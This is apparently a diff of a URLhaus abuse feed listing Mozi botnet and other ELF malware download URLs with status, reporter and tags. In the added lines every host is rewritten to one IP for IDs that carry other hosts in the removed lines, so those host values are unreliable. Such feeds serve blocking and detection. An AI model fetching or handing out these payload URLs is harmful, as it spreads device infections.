-{"id":"961270","urlhaus_reference":"https://urlhaus.abuse.ch/url/961270/","url":"http://115.58.133.53:59599/Mozi.m","url_status":"online","host":"115.58.133.53","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961271","urlhaus_reference":"https://urlhaus.abuse.ch/url/961271/","url":"http://115.56.130.11:45189/Mozi.a","url_status":"online","host":"115.56.130.11","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961272","urlhaus_reference":"https://urlhaus.abuse.ch/url/961272/","url":"http://120.85.210.224:60805/Mozi.a","url_status":"online","host":"120.85.210.224","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961273","urlhaus_reference":"https://urlhaus.abuse.ch/url/961273/","url":"http://115.56.27.220:38888/Mozi.m","url_status":"online","host":"115.56.27.220","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961274","urlhaus_reference":"https://urlhaus.abuse.ch/url/961274/","url":"http://115.48.157.100:47869/Mozi.m","url_status":"online","host":"115.48.157.100","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961275","urlhaus_reference":"https://urlhaus.abuse.ch/url/961275/","url":"http://103.157.241.40:57478/Mozi.m","url_status":"online","host":"103.157.241.40","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961269","urlhaus_reference":"https://urlhaus.abuse.ch/url/961269/","url":"http://59.99.93.45:40256/bin.sh","url_status":"offline","host":"59.99.93.45","date_added":"2021-01-14 19:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961268","urlhaus_reference":"https://urlhaus.abuse.ch/url/961268/","url":"http://60.161.45.175:49035/Mozi.m","url_status":"online","host":"60.161.45.175","date_added":"2021-01-14 19:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961266","urlhaus_reference":"https://urlhaus.abuse.ch/url/961266/","url":"http://61.54.215.77:41531/Mozi.m","url_status":"online","host":"61.54.215.77","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961267","urlhaus_reference":"https://urlhaus.abuse.ch/url/961267/","url":"http://59.99.41.229:49596/Mozi.a","url_status":"offline","host":"59.99.41.229","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961265","urlhaus_reference":"https://urlhaus.abuse.ch/url/961265/","url":"http://61.52.197.146:43584/Mozi.m","url_status":"online","host":"61.52.197.146","date_added":"2021-01-14 19:07:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961264","urlhaus_reference":"https://urlhaus.abuse.ch/url/961264/","url":"http://59.92.181.82:44976/Mozi.m","url_status":"offline","host":"59.92.181.82","date_added":"2021-01-14 19:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961259","urlhaus_reference":"https://urlhaus.abuse.ch/url/961259/","url":"http://58.249.75.46:51107/Mozi.m","url_status":"online","host":"58.249.75.46","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961260","urlhaus_reference":"https://urlhaus.abuse.ch/url/961260/","url":"http://42.227.162.7:33790/Mozi.m","url_status":"online","host":"42.227.162.7","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961261","urlhaus_reference":"https://urlhaus.abuse.ch/url/961261/","url":"http://219.157.26.241:58919/Mozi.m","url_status":"online","host":"219.157.26.241","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961262","urlhaus_reference":"https://urlhaus.abuse.ch/url/961262/","url":"http://59.93.21.48:40395/Mozi.m","url_status":"offline","host":"59.93.21.48","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961263","urlhaus_reference":"https://urlhaus.abuse.ch/url/961263/","url":"http://59.92.216.111:53510/Mozi.m","url_status":"online","host":"59.92.216.111","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961258","urlhaus_reference":"https://urlhaus.abuse.ch/url/961258/","url":"http://183.17.147.46:39115/Mozi.m","url_status":"online","host":"183.17.147.46","date_added":"2021-01-14 19:05:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961257","urlhaus_reference":"https://urlhaus.abuse.ch/url/961257/","url":"http://123.14.93.124:40713/Mozi.m","url_status":"online","host":"123.14.93.124","date_added":"2021-01-14 19:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961256","urlhaus_reference":"https://urlhaus.abuse.ch/url/961256/","url":"http://182.59.195.56:54811/Mozi.m","url_status":"online","host":"182.59.195.56","date_added":"2021-01-14 19:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961255","urlhaus_reference":"https://urlhaus.abuse.ch/url/961255/","url":"http://153.37.155.55:58269/Mozi.a","url_status":"online","host":"153.37.155.55","date_added":"2021-01-14 19:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961251","urlhaus_reference":"https://urlhaus.abuse.ch/url/961251/","url":"http://123.14.95.248:47985/Mozi.m","url_status":"online","host":"123.14.95.248","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961252","urlhaus_reference":"https://urlhaus.abuse.ch/url/961252/","url":"http://185.106.46.2:38107/Mozi.m","url_status":"online","host":"185.106.46.2","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961253","urlhaus_reference":"https://urlhaus.abuse.ch/url/961253/","url":"http://123.14.180.59:50354/Mozi.m","url_status":"online","host":"123.14.180.59","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961254","urlhaus_reference":"https://urlhaus.abuse.ch/url/961254/","url":"http://190.140.131.14:44987/Mozi.m","url_status":"online","host":"190.140.131.14","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961249","urlhaus_reference":"https://urlhaus.abuse.ch/url/961249/","url":"http://125.43.33.108:44681/Mozi.m","url_status":"online","host":"125.43.33.108","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961250","urlhaus_reference":"https://urlhaus.abuse.ch/url/961250/","url":"http://123.14.65.211:58391/Mozi.m","url_status":"online","host":"123.14.65.211","date_added":"2021-01-14 19:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961248","urlhaus_reference":"https://urlhaus.abuse.ch/url/961248/","url":"http://117.194.164.34:48540/Mozi.a","url_status":"offline","host":"117.194.164.34","date_added":"2021-01-14 19:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961246","urlhaus_reference":"https://urlhaus.abuse.ch/url/961246/","url":"http://115.48.13.187:42755/Mozi.m","url_status":"online","host":"115.48.13.187","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961247","urlhaus_reference":"https://urlhaus.abuse.ch/url/961247/","url":"http://113.87.249.28:52688/Mozi.m","url_status":"online","host":"113.87.249.28","date_added":"2021-01-14 19:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961244","urlhaus_reference":"https://urlhaus.abuse.ch/url/961244/","url":"http://112.30.110.63:33782/Mozi.m","url_status":"online","host":"112.30.110.63","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961245","urlhaus_reference":"https://urlhaus.abuse.ch/url/961245/","url":"http://113.133.225.154:50381/Mozi.m","url_status":"online","host":"113.133.225.154","date_added":"2021-01-14 19:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961243","urlhaus_reference":"https://urlhaus.abuse.ch/url/961243/","url":"http://123.14.154.78:44219/Mozi.m","url_status":"online","host":"123.14.154.78","date_added":"2021-01-14 19:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961242","urlhaus_reference":"https://urlhaus.abuse.ch/url/961242/","url":"http://61.53.42.182:36619/bin.sh","url_status":"offline","host":"61.53.42.182","date_added":"2021-01-14 19:01:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961241","urlhaus_reference":"https://urlhaus.abuse.ch/url/961241/","url":"http://115.58.166.75:59976/i","url_status":"online","host":"115.58.166.75","date_added":"2021-01-14 18:56:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961239","urlhaus_reference":"https://urlhaus.abuse.ch/url/961239/","url":"http://59.92.217.228:48688/Mozi.a","url_status":"online","host":"59.92.217.228","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961240","urlhaus_reference":"https://urlhaus.abuse.ch/url/961240/","url":"http://221.145.179.219:45682/Mozi.m","url_status":"online","host":"221.145.179.219","date_added":"2021-01-14 18:51:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961238","urlhaus_reference":"https://urlhaus.abuse.ch/url/961238/","url":"http://59.99.136.49:34922/Mozi.m","url_status":"offline","host":"59.99.136.49","date_added":"2021-01-14 18:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961233","urlhaus_reference":"https://urlhaus.abuse.ch/url/961233/","url":"http://92.54.237.196:37489/Mozi.m","url_status":"online","host":"92.54.237.196","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961234","urlhaus_reference":"https://urlhaus.abuse.ch/url/961234/","url":"http://186.33.104.184:51940/Mozi.m","url_status":"online","host":"186.33.104.184","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961235","urlhaus_reference":"https://urlhaus.abuse.ch/url/961235/","url":"http://59.99.40.58:49599/Mozi.a","url_status":"offline","host":"59.99.40.58","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961236","urlhaus_reference":"https://urlhaus.abuse.ch/url/961236/","url":"http://59.99.92.249:53436/Mozi.m","url_status":"offline","host":"59.99.92.249","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961237","urlhaus_reference":"https://urlhaus.abuse.ch/url/961237/","url":"http://58.249.11.35:57237/Mozi.a","url_status":"online","host":"58.249.11.35","date_added":"2021-01-14 18:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961232","urlhaus_reference":"https://urlhaus.abuse.ch/url/961232/","url":"http://42.224.251.45:50907/Mozi.m","url_status":"online","host":"42.224.251.45","date_added":"2021-01-14 18:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961231","urlhaus_reference":"https://urlhaus.abuse.ch/url/961231/","url":"http://117.208.134.248:41910/Mozi.m","url_status":"online","host":"117.208.134.248","date_added":"2021-01-14 18:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961229","urlhaus_reference":"https://urlhaus.abuse.ch/url/961229/","url":"http://115.55.93.86:57217/Mozi.m","url_status":"online","host":"115.55.93.86","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961230","urlhaus_reference":"https://urlhaus.abuse.ch/url/961230/","url":"http://117.196.50.105:47632/Mozi.m","url_status":"online","host":"117.196.50.105","date_added":"2021-01-14 18:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961227","urlhaus_reference":"https://urlhaus.abuse.ch/url/961227/","url":"http://116.75.197.63:46654/Mozi.a","url_status":"online","host":"116.75.197.63","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961228","urlhaus_reference":"https://urlhaus.abuse.ch/url/961228/","url":"http://115.55.33.224:59073/Mozi.m","url_status":"online","host":"115.55.33.224","date_added":"2021-01-14 18:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961221","urlhaus_reference":"https://urlhaus.abuse.ch/url/961221/","url":"http://116.75.192.61:37958/Mozi.a","url_status":"offline","host":"116.75.192.61","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961222","urlhaus_reference":"https://urlhaus.abuse.ch/url/961222/","url":"http://119.178.250.25:53943/Mozi.m","url_status":"online","host":"119.178.250.25","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961223","urlhaus_reference":"https://urlhaus.abuse.ch/url/961223/","url":"http://115.59.212.117:40404/Mozi.m","url_status":"online","host":"115.59.212.117","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961224","urlhaus_reference":"https://urlhaus.abuse.ch/url/961224/","url":"http://182.114.210.156:46738/Mozi.m","url_status":"online","host":"182.114.210.156","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961225","urlhaus_reference":"https://urlhaus.abuse.ch/url/961225/","url":"http://123.12.231.116:58234/Mozi.m","url_status":"online","host":"123.12.231.116","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961226","urlhaus_reference":"https://urlhaus.abuse.ch/url/961226/","url":"http://182.59.230.66:36911/Mozi.a","url_status":"online","host":"182.59.230.66","date_added":"2021-01-14 18:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961220","urlhaus_reference":"https://urlhaus.abuse.ch/url/961220/","url":"http://115.207.21.23:35028/Mozi.m","url_status":"online","host":"115.207.21.23","date_added":"2021-01-14 18:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961291","urlhaus_reference":"https://urlhaus.abuse.ch/url/961291/","url":"http://89.160.20.156:33946/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961292","urlhaus_reference":"https://urlhaus.abuse.ch/url/961292/","url":"http://89.160.20.156:39990/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961288","urlhaus_reference":"https://urlhaus.abuse.ch/url/961288/","url":"http://89.160.20.156:60558/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961289","urlhaus_reference":"https://urlhaus.abuse.ch/url/961289/","url":"http://89.160.20.156:32989/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961290","urlhaus_reference":"https://urlhaus.abuse.ch/url/961290/","url":"http://89.160.20.156:52458/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961286","urlhaus_reference":"https://urlhaus.abuse.ch/url/961286/","url":"http://89.160.20.156:60735/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961287","urlhaus_reference":"https://urlhaus.abuse.ch/url/961287/","url":"http://89.160.20.156:34755/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961285","urlhaus_reference":"https://urlhaus.abuse.ch/url/961285/","url":"http://89.160.20.156:39290/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961279","urlhaus_reference":"https://urlhaus.abuse.ch/url/961279/","url":"http://89.160.20.156:56141/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961280","urlhaus_reference":"https://urlhaus.abuse.ch/url/961280/","url":"http://89.160.20.156:40247/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961281","urlhaus_reference":"https://urlhaus.abuse.ch/url/961281/","url":"http://89.160.20.156:36619/i","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961282","urlhaus_reference":"https://urlhaus.abuse.ch/url/961282/","url":"http://89.160.20.156:43673/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961283","urlhaus_reference":"https://urlhaus.abuse.ch/url/961283/","url":"http://89.160.20.156:55726/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961284","urlhaus_reference":"https://urlhaus.abuse.ch/url/961284/","url":"http://89.160.20.156:59668/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961278","urlhaus_reference":"https://urlhaus.abuse.ch/url/961278/","url":"http://89.160.20.156:34391/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961277","urlhaus_reference":"https://urlhaus.abuse.ch/url/961277/","url":"http://89.160.20.156:49478/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961276","urlhaus_reference":"https://urlhaus.abuse.ch/url/961276/","url":"http://89.160.20.156:54670/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961270","urlhaus_reference":"https://urlhaus.abuse.ch/url/961270/","url":"http://89.160.20.156:59599/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961271","urlhaus_reference":"https://urlhaus.abuse.ch/url/961271/","url":"http://89.160.20.156:45189/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961272","urlhaus_reference":"https://urlhaus.abuse.ch/url/961272/","url":"http://89.160.20.156:60805/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961273","urlhaus_reference":"https://urlhaus.abuse.ch/url/961273/","url":"http://89.160.20.156:38888/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961274","urlhaus_reference":"https://urlhaus.abuse.ch/url/961274/","url":"http://89.160.20.156:47869/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961275","urlhaus_reference":"https://urlhaus.abuse.ch/url/961275/","url":"http://89.160.20.156:57478/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961269","urlhaus_reference":"https://urlhaus.abuse.ch/url/961269/","url":"http://89.160.20.156:40256/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961268","urlhaus_reference":"https://urlhaus.abuse.ch/url/961268/","url":"http://89.160.20.156:49035/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961266","urlhaus_reference":"https://urlhaus.abuse.ch/url/961266/","url":"http://89.160.20.156:41531/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961267","urlhaus_reference":"https://urlhaus.abuse.ch/url/961267/","url":"http://89.160.20.156:49596/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 